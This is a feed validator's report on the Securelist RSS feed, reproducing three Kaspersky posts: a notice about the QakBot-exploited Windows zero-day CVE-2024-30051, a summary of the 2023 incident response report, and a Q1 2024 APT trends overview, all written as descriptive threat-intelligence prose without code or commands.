FEED Validator

Congratulations!

This is a valid RSS feed.

Recommendations

This feed is valid, but interoperability with the widest range of feed readers could be improved by implementing the following recommendations.

• line 48, column 0: content:encoded should not contain decoding attribute (54 occurrences) [help]

  										<content:encoded><![CDATA[<p><img width="990" height="400" src="ht ...
  

• line 48, column 0: content:encoded should not contain fetchpriority attribute [help]

  										<content:encoded><![CDATA[<p><img width="990" height="400" src="ht ...
  

• line 89, column 0: content:encoded should not contain loading attribute (51 occurrences) [help]

  										<content:encoded><![CDATA[<p><img width="990" height="400" src="ht ...
  

• line 93, column 0: content:encoded should not contain aria-describedby attribute (36 occurrences) [help]

  <div id="attachment_112608" style="width: 1034px" class="wp-caption aligncen ...
  

• line 93, column 0: content:encoded should not contain sizes attribute (43 occurrences) [help]

  <div id="attachment_112608" style="width: 1034px" class="wp-caption aligncen ...
  

• line 308, column 0: content:encoded should not contain data-id attribute (16 occurrences) [help]

  <div class="js-infogram-embed" data-id="_/rvIDXYRQBafAdsv5iuRS" data-type="i ...
  

• line 308, column 0: content:encoded should not contain data-type attribute (16 occurrences) [help]

  <div class="js-infogram-embed" data-id="_/rvIDXYRQBafAdsv5iuRS" data-type="i ...
  

• line 308, column 0: content:encoded should not contain data-title attribute (16 occurrences) [help]

  <div class="js-infogram-embed" data-id="_/rvIDXYRQBafAdsv5iuRS" data-type="i ...
  

• line 308, column 0: style attribute contains potentially dangerous content: min-height (32 occurrences) [help]

  <div class="js-infogram-embed" data-id="_/rvIDXYRQBafAdsv5iuRS" data-type="i ...
  

• line 1788, column 0: Invalid HTML: malformed start tag, at line 167, column 129 [help]

  <a href="https://opentip.kaspersky.com/tg1sea23g.commonline.space/?utm_sourc ...
  

Source: https://securelist.com/feed/

1. <?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
2. xmlns:content="http://purl.org/rss/1.0/modules/content/"
3. xmlns:wfw="http://wellformedweb.org/CommentAPI/"
4. xmlns:dc="http://purl.org/dc/elements/1.1/"
5. xmlns:atom="http://www.w3.org/2005/Atom"
6. xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
7. xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
8. >
9.  
10. <channel>
11. <title>Securelist</title>
12. <atom:link href="https://securelist.com/feed/" rel="self" type="application/rss+xml" />
13. <link>https://securelist.com</link>
14. <description></description>
15. <lastBuildDate>Fri, 17 May 2024 08:51:49 +0000</lastBuildDate>
16. <language>en-US</language>
17. <sy:updatePeriod>
18. hourly </sy:updatePeriod>
19. <sy:updateFrequency>
20. 1 </sy:updateFrequency>
21. <generator>https://wordpress.org/?v=6.5.2</generator>
22.  
23. <image>
24. <url>https://securelist.com/wp-content/themes/securelist2020/assets/images/content/site-icon.png</url>
25. <title>Securelist</title>
26. <link>https://securelist.com</link>
27. <width>32</width>
28. <height>32</height>
29. </image>
30. <item>
31. <title>QakBot attacks with Windows zero-day (CVE-2024-30051)</title>
32. <link>https://securelist.com/cve-2024-30051/112618/</link>
33. <comments>https://securelist.com/cve-2024-30051/112618/#respond</comments>
35. <dc:creator><![CDATA[Boris Larin, Mert Degirmenci]]></dc:creator>
36. <pubDate>Tue, 14 May 2024 17:14:38 +0000</pubDate>
37. <category><![CDATA[Software]]></category>
38. <category><![CDATA[CVE-2024-30051]]></category>
39. <category><![CDATA[Microsoft Windows]]></category>
40. <category><![CDATA[QakBot]]></category>
41. <category><![CDATA[Vulnerabilities]]></category>
42. <category><![CDATA[Vulnerabilities and exploits]]></category>
43. <category><![CDATA[Zero-day vulnerabilities]]></category>
44. <category><![CDATA[Vulnerabilities and exploits]]></category>
45. <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=112618</guid>
46.  
47. <description><![CDATA[In April 2024, while researching CVE-2023-36033, we discovered another zero-day elevation-of-privilege vulnerability, which was assigned CVE-2024-30051 identifier and patched on May, 14 as part of Microsoft's patch Tuesday. We have seen it exploited by QakBot and other malware.]]></description>
48. <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/24151135/sl-abstract-security-alert-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" fetchpriority="high" /></p><p>In early April 2024, we decided to take a closer look at the Windows DWM Core Library Elevation of Privilege Vulnerability <a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2023-36033" target="_blank" rel="noopener">CVE-2023-36033</a>, which was previously discovered as a zero-day exploited in the wild. While searching for samples related to this exploit and attacks that used it, we found a curious document uploaded to VirusTotal on April 1, 2024. This document caught our attention because it had a rather descriptive file name, which indicated that it contained information about a vulnerability in Windows OS. Inside we found a brief description of a Windows Desktop Window Manager (DWM) vulnerability and how it could be exploited to gain system privileges, everything written in very broken English. The exploitation process described in this document was identical to that used in the previously mentioned zero-day exploit for CVE-2023-36033, but the vulnerability was different. Judging by the quality of the writing and the fact that the document was missing some important details about how to actually trigger the vulnerability, there was a high chance that the described vulnerability was completely made up or was present in code that could not be accessed or controlled by attackers. But we still decided to investigate it, and a quick check showed that this is a real zero-day vulnerability that can be used to escalate privileges. We promptly reported our findings to Microsoft, the vulnerability was designated <a href="https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2024-30051" target="_blank" rel="noopener">CVE-2024-30051</a>, and a patch was released on May 14, 2024, as part of Patch Tuesday.</p>
49. <p>After sending our findings to Microsoft, we began to closely monitor our statistics in search of exploits and attacks that exploit this zero-day vulnerability, and in mid-April we discovered an exploit for this zero-day vulnerability. We have seen it used together with <a href="https://securelist.com/?s=QakBot" target="_blank" rel="noopener">QakBot</a> and other malware, and believe that multiple threat actors have access to it.</p>
50. <p>We are going to publish technical details about CVE-2024-30051 once users have had time to update their Windows systems.</p>
51. <p>Kaspersky products detect the exploitation of CVE-2024-30051 and related malware with the verdicts:</p>
52. <ul>
53. <li>PDM:Exploit.Win32.Generic;</li>
54. <li>PDM:Trojan.Win32.Generic;</li>
55. <li>UDS:DangerousObject.Multi.Generic;</li>
56. <li>Trojan.Win32.Agent.gen;</li>
57. <li>Trojan.Win32.CobaltStrike.gen.</li>
58. </ul>
59. <p><em>Kaspersky would like to thank Microsoft for their prompt analysis of the report and patches.</em></p>
60. ]]></content:encoded>
62. <wfw:commentRss>https://securelist.com/cve-2024-30051/112618/feed/</wfw:commentRss>
63. <slash:comments>0</slash:comments>
66. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/24151135/sl-abstract-security-alert.jpg" width="1927" height="1037"><media:keywords>full</media:keywords></media:content>
67. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/24151135/sl-abstract-security-alert-1024x551.jpg" width="1024" height="551"><media:keywords>large</media:keywords></media:content>
68. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/24151135/sl-abstract-security-alert-300x161.jpg" width="300" height="161"><media:keywords>medium</media:keywords></media:content>
69. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/24151135/sl-abstract-security-alert-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
70. </item>
71. <item>
72. <title>Incident response analyst report 2023</title>
73. <link>https://securelist.com/kaspersky-incident-response-report-2023/112504/</link>
74. <comments>https://securelist.com/kaspersky-incident-response-report-2023/112504/#comments</comments>
76. <dc:creator><![CDATA[Kaspersky GERT, Kaspersky Security Services]]></dc:creator>
77. <pubDate>Tue, 14 May 2024 11:00:59 +0000</pubDate>
78. <category><![CDATA[SOC, TI and IR posts]]></category>
79. <category><![CDATA[Cybersecurity]]></category>
80. <category><![CDATA[Incident response]]></category>
81. <category><![CDATA[Internal Threats Statistics]]></category>
82. <category><![CDATA[LockBit]]></category>
83. <category><![CDATA[Ransomware]]></category>
84. <category><![CDATA[Security services]]></category>
85. <category><![CDATA[Internal threats]]></category>
86. <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=112504</guid>
87.  
88. <description><![CDATA[The report shares statistics and observations from incident response practice in 2023, analyzes trends and gives cybersecurity recommendations.]]></description>
89. <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/14084347/sl-ir-analytical-report-2023-featured2-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/13125640/Kaspersky-IR_Analyst_report_2023_EN.pdf" target="_blank" rel="noopener">Incident response analyst report 2023</a></p>
90. <p>As an information security company, our services include incident response and investigation, and malware analysis. Our customer base spans Russia, Europe, Asia, South and North America, Africa and the Middle East. Our annual Incident Response Report presents anonymized statistics on the cyberattacks we investigated in 2023. All data is derived from working with organizations that requested our expertise in carrying out incident response (IR) or assisting their in-house expert team.</p>
91. <h2 id="distribution-of-incidents-by-region-and-industry">Distribution of incidents by region and industry</h2>
92. <p>The geography of the service has changed somewhat of late, with the share of requests in Russia and the CIS (47.27%) continuing to rise. At the same time, 2023 is notable for the significant increase in the number of IR requests in the second-place Americas region (21.82%).</p>
93. <div id="attachment_112608" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/13145754/IR_report_2023_Global_01.jpeg" class="magnificImage"><img decoding="async" aria-describedby="caption-attachment-112608" class="size-large wp-image-112608" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/13145754/IR_report_2023_Global_01-1024x643.jpeg" alt="Geographic distribution of IR requests, 2023" width="1024" height="643" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/13145754/IR_report_2023_Global_01-1024x643.jpeg 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/13145754/IR_report_2023_Global_01-300x188.jpeg 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/13145754/IR_report_2023_Global_01-768x482.jpeg 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/13145754/IR_report_2023_Global_01-557x350.jpeg 557w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/13145754/IR_report_2023_Global_01-740x465.jpeg 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/13145754/IR_report_2023_Global_01-446x280.jpeg 446w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/13145754/IR_report_2023_Global_01-800x503.jpeg 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/13145754/IR_report_2023_Global_01.jpeg 1428w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112608" class="wp-caption-text">Geographic distribution of IR requests, 2023</p></div>
94. <p>Looking at the distribution of incidents by industry, we see that in 2023 the majority of requests came from government agencies (27.89%) and industrial enterprises (17.01%).</p>
95. <div id="attachment_112609" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/13145829/IR_report_2023_Global_02.jpeg" class="magnificImage"><img decoding="async" aria-describedby="caption-attachment-112609" class="size-large wp-image-112609" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/13145829/IR_report_2023_Global_02-1024x755.jpeg" alt="Distribution of organizations that requested IR assistance, by industry, 2023" width="1024" height="755" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/13145829/IR_report_2023_Global_02-1024x755.jpeg 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/13145829/IR_report_2023_Global_02-300x221.jpeg 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/13145829/IR_report_2023_Global_02-768x566.jpeg 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/13145829/IR_report_2023_Global_02-475x350.jpeg 475w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/13145829/IR_report_2023_Global_02-740x546.jpeg 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/13145829/IR_report_2023_Global_02-380x280.jpeg 380w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/13145829/IR_report_2023_Global_02-800x590.jpeg 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/13145829/IR_report_2023_Global_02.jpeg 1428w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112609" class="wp-caption-text">Distribution of organizations that requested IR assistance, by industry, 2023</p></div>
96. <h2 id="2023-trends-ransomware-and-supply-chain-attacks">2023 trends: ransomware and supply chain attacks</h2>
97. <p>In 2023, ransomware remained the most prevalent threat, despite a drop in share to 33.3%, down from 39.8% in 2022. Ransomware targeted organizations indiscriminately, regardless of industry. The most common families we came across in our investigations were <a href="https://securelist.com/tag/lockbit/" target="_blank" rel="noopener">LockBit</a> (27.78%), <a href="https://securelist.com/a-bad-luck-blackcat/106254/" target="_blank" rel="noopener">BlackCat</a> (12.96%), Phobos (9.26%) and Zeppelin (9.26%).</p>
98. <p>Another important trend we observed in 2023 was the significant rise in the number of attacks through trusted relationships with contractors and service providers. This attack vector was among the three most frequently seen in 2023. This is not surprising, for it allows threat actors to carry out large-scale attacks with a great deal more efficiency than if they targeted each victim individually. For many organizations such attacks can be devastating, and detecting them takes a lot longer because the attackers&#8217; actions can be hard to distinguish from those of employees working for a contractor.</p>
99. <h2 id="report-contents">Report contents</h2>
100. <p>The full report covers:</p>
101. <ul>
102. <li>IR statistics: what events prompted organizations to request IR services, at what stages attacks were detected, how long it took on average to respond to them;</li>
103. <li>Common tactics, techniques and procedures employed by threat actors at different stages of attack development;</li>
104. <li>Legitimate tools used in attacks, with examples of their use in real-world incidents;</li>
105. <li>Vulnerabilities most often exploited by threat actors.</li>
106. </ul>
107. <h2 id="recommendations-for-preventing-cyberincidents">Recommendations for preventing cyberincidents</h2>
108. <p>To reduce the risk of a successful cyberattack on your organization, or minimize the damage if attackers do penetrate your infrastructure, we recommend:</p>
109. <ul>
110. <li>Enforcing a strict password policy and protecting key resources with multi-factor authentication;</li>
111. <li>Closing remote management ports to outside access;</li>
112. <li>Promptly updating software and deploying additional security measures for services at the network perimeter;</li>
113. <li>Cybersecurity awareness training and related activities for employees;</li>
114. <li>Restricting the use of legitimate tools that may be utilized for attacks on the corporate network, and creating rules for detecting such tools;</li>
115. <li>Conducting regular cyber drills focused on common attacker techniques;</li>
116. <li>Backing up data on a regular basis;</li>
117. <li>Protecting endpoints with EDR solutions;</li>
118. <li>Subscribing to an IR service guaranteed under an SLA.</li>
119. </ul>
120. <p>Read the full <a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/13125640/Kaspersky-IR_Analyst_report_2023_EN.pdf" target="_blank" rel="noopener">2023 Incident Response Report (PDF)</a>.</p>
121. ]]></content:encoded>
123. <wfw:commentRss>https://securelist.com/kaspersky-incident-response-report-2023/112504/feed/</wfw:commentRss>
124. <slash:comments>1</slash:comments>
127. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/14084347/sl-ir-analytical-report-2023-featured2.jpg" width="1200" height="800"><media:keywords>full</media:keywords></media:content>
128. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/14084347/sl-ir-analytical-report-2023-featured2-1024x683.jpg" width="1024" height="683"><media:keywords>large</media:keywords></media:content>
129. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/14084347/sl-ir-analytical-report-2023-featured2-300x200.jpg" width="300" height="200"><media:keywords>medium</media:keywords></media:content>
130. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/14084347/sl-ir-analytical-report-2023-featured2-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
131. </item>
132. <item>
133. <title>APT trends report Q1 2024</title>
134. <link>https://securelist.com/apt-trends-report-q1-2024/112473/</link>
135. <comments>https://securelist.com/apt-trends-report-q1-2024/112473/#respond</comments>
137. <dc:creator><![CDATA[GReAT]]></dc:creator>
138. <pubDate>Thu, 09 May 2024 10:00:28 +0000</pubDate>
139. <category><![CDATA[APT reports]]></category>
140. <category><![CDATA[APT]]></category>
141. <category><![CDATA[Backdoor]]></category>
142. <category><![CDATA[Careto]]></category>
143. <category><![CDATA[Cyber espionage]]></category>
144. <category><![CDATA[DuneQuixote]]></category>
145. <category><![CDATA[hacktivists]]></category>
146. <category><![CDATA[Kimsuky]]></category>
147. <category><![CDATA[Mobile Malware]]></category>
148. <category><![CDATA[Targeted attacks]]></category>
149. <category><![CDATA[Trojan]]></category>
150. <category><![CDATA[APT (Targeted attacks)]]></category>
151. <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=112473</guid>
152.  
153. <description><![CDATA[The report features the most significant developments relating to APT groups in Q1 2024, including the new malware campaigns DuneQuixote and Durian, and hacktivist activity.]]></description>
154. <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/02152855/sl-abstract-net-landscape-vr-blue-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p>For more than six years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. These summaries are based on our threat intelligence research. They provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of.</p>
155. <p>This is our latest installment, focusing on activities that we observed during Q1 2024.</p>
156. <p>Readers who would like to learn more about our intelligence reports or request more information about a specific report, are encouraged to contact <a href="mailto:intelreports@kaspersky.com" target="_blank" rel="noopener">intelreports@kaspersky.com</a>.</p>
157. <h2 id="the-most-remarkable-findings">The most remarkable findings</h2>
158. <p>The Gelsemium group performs server-side exploitation that effectively leads to a webshell, and uses various custom and public tools deployed with stealth techniques and technologies. The two main implants, <a href="https://securelist.com/the-sessionmanager-iis-backdoor/106868/" target="_blank" rel="noopener">SessionManager</a> and OwlProxy, were first detected in 2022 in the aftermath of the ProxyLogon-type exploitations of Exchange Servers. Our latest investigation was prompted by the discovery of suspicious activity on a server located in Palestine in mid-November 2023, with traces of a previous breach attempt on October 12, 2023. The payloads were distinctively served, veiled as font files, in compressed and encrypted fashion. This characteristic led us to highly similar incidents in Tajikistan and Kyrgyzstan.</p>
159. <p>Careto is a highly sophisticated threat actor that has been seen targeting various high-profile organizations since at least 2007. However, the last operations conducted by this threat actor were observed in 2013. Since then, no information about Careto&#8217;s activity has been published. Recent threat hunting enabled us to gain an insight into campaigns run by Careto in 2024, 2022 and 2019. Our private report provided a detailed description of these activities, focusing on how the actor performed the initial infections, lateral movement, malware execution, and data exfiltration activities. It is notable that the Careto actor used custom techniques, such as employing the MDaemon email server to maintain a foothold inside the organization or leveraging the HitmanPro Alert driver for persistence. In total, we have seen Careto use three complex implants for malicious activities, which we dubbed &#8220;FakeHMP&#8221;, &#8220;Careto2&#8221;, and &#8220;Goreto&#8221;. The capabilities of these implants were also described in our private report.</p>
160. <h2 id="middle-east">Middle East</h2>
161. <p>In March, a <a href="https://securelist.com/dunequixote/112425/" target="_blank" rel="noopener">new malware campaign</a> was discovered, targeting government entities in the Middle East. We dubbed it &#8220;DuneQuixote&#8221;. Our investigation uncovered more than 30 DuneQuixote dropper samples actively employed in this campaign. The droppers represent tampered with installer files for a legitimate tool named &#8220;Total Commander&#8221;. These carry malicious code for downloading further payloads, at least some of which are backdoor samples dubbed &#8220;CR4T&#8221;. At the time of discovery, we identified only two such implants, yet we strongly suspect the existence of others that may come in the form of completely different malware. The group prioritized the prevention of collection and analysis of their implants – the DuneQuixote campaigns display practical and well-designed evasion methods, both in network communications and malware code.</p>
162. <p>Our last report on the Oilrig APT discussed how IT service providers were potentially used as a pivot point to reach their clients as an end-target, and we kept tracking the threat actor&#8217;s activity to identify relevant infection attempts. We detected another activity in the process, likely by the same threat actor, but this time targeting an internet service provider in the Middle East. This new activity saw the actor using a .NET-based implant, which is staged using VB and PowerShell. The implant, which we named &#8220;SKYCOOK&#8221; for its function names, is a remote command execution and infostealer utility. The actor also used an autohotkey-based (AHK) keylogger similar to the one used in a previous intrusion.</p>
163. <h2 id="southeast-asia-and-korean-peninsula">Southeast Asia and Korean Peninsula</h2>
164. <p>We have been tracking the activities of DroppingElephant in the past few years and recently detected several samples of the Spyder backdloor in its operations, as well as the Remcos RAT and, in a smaller number of cases, other malicious RAT tools. We observed that the threat actor abuses the DISCORD CDN network and leverages malicious .DOC and .LNK files to deliver these remote access tools to victims in South Asia. The Spyder backdoor has been <a href="https://www.google.com/url?q=https://ti.qianxin.com/blog/articles/Patchwork-Group-Utilizing-WarHawk-Backdoor-Variant-Spyder-for-Espionage-against-Multiple-Countries-EN/&amp;sa=D&amp;source=docs&amp;ust=1713519242825624&amp;usg=AOvVaw2X7T0-3A0QHTLR_7Mn86mw" target="_blank" rel="noopener">detailed by QiAnXin</a>, along with its use in targeting multiple entities in South Asia. In our report, we shared newly discovered IoCs and the type of targeted organizations based on our telemetry.</p>
165. <p>At the end of 2023, we discovered a striking malware variant orchestrated by the Kimsuky group, delivered by exploiting legitimate software exclusive to South Korea. While the precise method used to manipulate this legitimate program as the initial infection vector remains unclear, we confirmed that the legitimate software established a connection to the attacker&#8217;s server. Subsequently, it retrieved a malicious file, thereby initiating the first stage of the malware.</p>
166. <p>The initial-stage malware serves as a conventional installer designed to introduce supplementary malware and establish a persistence mechanism. Upon execution of the installer, it generates a subsequent stage loader and adds it to the Windows service for automatic execution. The culminating payload in this sequence is previously unknown Golang-based malware dubbed &#8220;Durian&#8221;. Durian boasts comprehensive backdoor functionality, enabling the execution of delivered commands, additional file downloads and exfiltration of files.</p>
167. <p>With the help of Durian, the operator implemented various preliminary methods to sustain a connection with the victim. First, they introduced additional malware named &#8220;AppleSeed&#8221;, an HTTP-based backdoor commonly employed by the Kimsuky group. Furthermore, they incorporated legitimate tools, including ngrok and Chrome Remote Desktop, along with a custom proxy tool, to access target machines. Ultimately, the actor implanted the malware to pilfer browser-stored data including cookies and login credentials.</p>
168. <p>Based on our telemetry, we pinpointed two victims within the South Korean cryptocurrency sector. The first compromise occurred in August 2023, followed by a second in November 2023. Notably, our investigation did not uncover any additional victims during these instances, indicating a highly focused targeting approach by the actor.</p>
169. <p>Given that the actor exclusively employed the AppleSeed malware, a tool historically associated with the Kimsuky group, we have a high level of confidence in attributing these attacks to Kimsuky. However, intriguingly, we have detected a tenuous connection with the Andariel group. Andariel, known for adopting a custom proxy tool named &#8220;LazyLoad&#8221;, appears to share similarities with the actor in this attack, who also utilized LazyLoad, as observed during our research. This nuanced connection warrants further exploration into the potential collaboration or tactics shared between these two threat actors.</p>
170. <p>ViolentParody is a backdoor detected inside a South Korean gaming company, with the latest deployments observed in January this year. The threat actor distributed this backdoor over the organization&#8217;s network by infecting a batch file located on an internal network share. The execution of said infected .BAT file results in the launch of an MSI installer that in turn drops the backdoor on the machine and configures it to persist through scheduled tasks and COM objects. Analysis of this backdoor revealed that couldcollect reconnaissance data on the infected machine, perform file system operations and inject various payloads. We additionally observed the threat actor behind this backdoor launching penetration testing tools, such as Ligolo-ng, Inveigh and Impacket. We attribute the activity described in our report to Winnti with low confidence.</p>
171. <p>The threat actor SideWinder launched hundreds of attacks in recent months against high-profile entities in Asia and Africa. Most of the attacks start with a spear-phishing email containing a Microsoft Word document or a ZIP archive with an LNK file inside. The attachment kicks off a chain of events that lead to the execution of multiple intermediate stages with different JavaScript and .NET loaders, and finally ends with a malicious implant developed in .NET that runs only in memory.</p>
172. <p>During the investigation, we observed a rather large infrastructure composed of many different virtual private servers and dozens of subdomains. Many subdomains are assumed to be created for specific victims, and the naming scheme indicated that the attacker had tried to disguise malicious communications as legitimate traffic from websites related to governmental entities or logistics companies.</p>
173. <p>SideWinder has historically targeted governmental and military entities in South Asia, but in this case, we observed an expanded range of  targets. The actor also compromised victims located in Southeast Asia and Africa. Moreover, we saw different diplomatic entities in Europe, Asia and Africa that were compromised. The expansion in targeting also includes new industries, proven by the discoveries of new targets in the logistics sector, more specifically in maritime logistics.</p>
174. <p>The <a href="https://securelist.com/tag/lazarus/" target="_blank" rel="noopener">Lazarus</a> group has various malware clusters in its arsenal and continues to update its functionalities and techniques to evade detection. However, the actor can also be observed employing its old malware on occasion. We recently discovered that this notorious actor was testing its old and familiar tool, <a href="https://securelist.com/lazarus-threatneedle/100803/" target="_blank" rel="noopener">ThreatNeedle</a>. The malware author utilized a binder tool to create initial-stage malware for delivering and implanting the final payload. The main objective of the binder tool is assembling the malware installer, actual payload and configuration. In addition, we discovered various malicious files from an affected machine fetching the next-stage payload after sending the victim&#8217;s profile. This kind of downloader malware is typical of Lazarus&#8217;s modus operandi. However, the group adopted a more complex HTTP communication format at this time to evade detection at the network level. By investigating the Command-and-Control (C2) resources used by the actor, we discovered <a href="https://en.wikipedia.org/wiki/Npm" target="_blank" rel="noopener">NPM</a> packages that contain malicious JavaScript code to deliver malware without user notification. Most of them are disguised as cryptocurrency-related programs and capable of downloading an additional payload from the actor-controlled server. This is a highly similar strategy to the scheme that we have observed and reported in the past.</p>
175. <h2 id="hacktivism">Hacktivism</h2>
176. <p>Hacktivism, a marriage of hacking and activism, is often excluded from a company&#8217;s threat profile. This type of threat actor is commonly active in all types of crises, conflicts, wars and protests, among other events. The goal is to send a political, social or ideological message using digital means.</p>
177. <p>SiegedSec stepped up its hacktivist intrusions and activities internationally throughout 2023. This small group, active since 2022, mainly performs hack-and-leak operations. As with past hacktivist groups like LulzSec, what started as hack-and-leak and disruptive operations &#8220;just for lulz&#8221;, evolved into multiple offensive efforts in pursuit of social justice-related goals across the globe. The activities also led to coordination with other cybercriminal groups as part of the Five Families hacktivist collective, although SiegedSec were later expelled for alleged improper conduct.</p>
178. <p>Their recent offensive activity is contingent on current socio-political events. Their web-application-focused offensive activity targets companies and industrial and government infrastructure, and they leak stolen sensitive information. SiegedSec&#8217;s social justice initiatives include demanding freedom for an arrested Colombian website defacer / hacker, U.S. state governments&#8217; involvement in instituting anti-abortion laws, the ongoing Israel-Hamas conflict and alleged human rights violations by NATO. The group&#8217;s members, both past and present, are still at large.</p>
179. <p>During the Israel-Hamas conflict, there has been an uptick in activities by hacktivists from all around the world, including denial of service (DoS and DDoS), web defacements, doxing and recycling of old leaks. The targets and victims have been primarily Israeli and Palestinian infrastructure. But since there are supporters on both sides of this conflict, hacktivists also target the infrastructure of supporting countries.</p>
180. <p>To mitigate exposure to threat actors of this type, it is first important to update the threat/risk profile when similar events happen. Second, it is vital to understand the technology exposure connected to the respective country or institution, and prevent unauthorized access by ensuring secure access and updated software. Third, DoS/DDoS readiness is essential. Although these attacks are transient, merely denying access for a limited time before normal service resumes, the respective tools are widely available, and their disruptive impact on business operation may vary depending on attack duration and size. Therefore, it is essential to implement measures to mitigate against application and volumetric attacks. Finally, data leaks are almost inevitable nowadays. Hackers may merely start with stolen credentials to gain full enterprise access and leak sensitive data. The data may then get recycled in future events, to associate the hot topic of compromise with the hacktivist message, so that it can be heard widely. The best approach to mitigate against this is to prevent the data leak in the first place. Implementing ways to monitor the network flow can be helpful in identifying an unusually large outbound data flow, which could be blocked at an early stage.</p>
181. <h2 id="other-interesting-discoveries">Other interesting discoveries</h2>
182. <p>In 2020, we reported an ongoing campaign, started in 2019, that leveraged what was at the time new Android malware named &#8220;Spyrtacus&#8221;, used against individuals in Italy. The tool exhibited similarities with HelloSpy, the infamous stalkerware used to remotely monitor infected devices. The threat actor first started distributing the malicious APK via Google Play in 2018, but switched to malicious web pages forged to imitate legitimate resources relating to the most common Italian internet service providers in 2019. We have continued to monitor this threat over the years and recently observed a previously unknown Spyrtacus agent developed for Windows. The implant communicates with a C2 resource already reported in one of our previous reports and shares similarities to the Android counterpart in both malware logic and the communication protocol. During the investigation, we discovered other subdomains, which indicate the existence of implants for iOS and macOS, and may indicate the expansion of the group&#8217;s activities to other countries in Europe, Africa and the Middle East.</p>
183. <h2 id="final-thoughts">Final thoughts</h2>
184. <p>While the TTPs of some threat actors remain consistent over time, such as heavy reliance on social engineering as a means of gaining a foothold in a target organization or compromising an individual&#8217;s device, others have refreshed their toolsets and expanded the scope of their activities. Our regular quarterly reviews are intended to highlight the most significant developments relating to APT groups.</p>
185. <p>Here are the main trends that we saw in Q1 2024:</p>
186. <ul>
187. <li>The key highlights this quarter include Kimsuky&#8217;s use of the Golang-based backdoor Durian in a supply-chain attack in South Korea, and campaigns focused on the Middle East, including APTs such as Gelsemium, but also hacktivist attacks.</li>
188. <li>The Spyrtacus malware used for targeting individuals in Italy demonstrates that threat actors continue to develop for multiple platforms, including mobile malware.</li>
189. <li>APT campaigns continue to be very geographically dispersed. This quarter, we reported campaigns focused on Europe, the Americas, the Middle East, Asia and Africa.</li>
190. <li>We have seen attacks targeting a variety of sectors, including government, diplomatic, gaming, maritime logistics and an ISP.</li>
191. <li>Geopolitics remains a key driver of APT development, and cyberespionage remains a prime goal of APT campaigns.</li>
192. <li>We also continue to see hacktivist campaigns: these have been centered mainly around the Israel-Hamas conflict, but not exclusively, as the activities of SiegedSec illustrate.</li>
193. </ul>
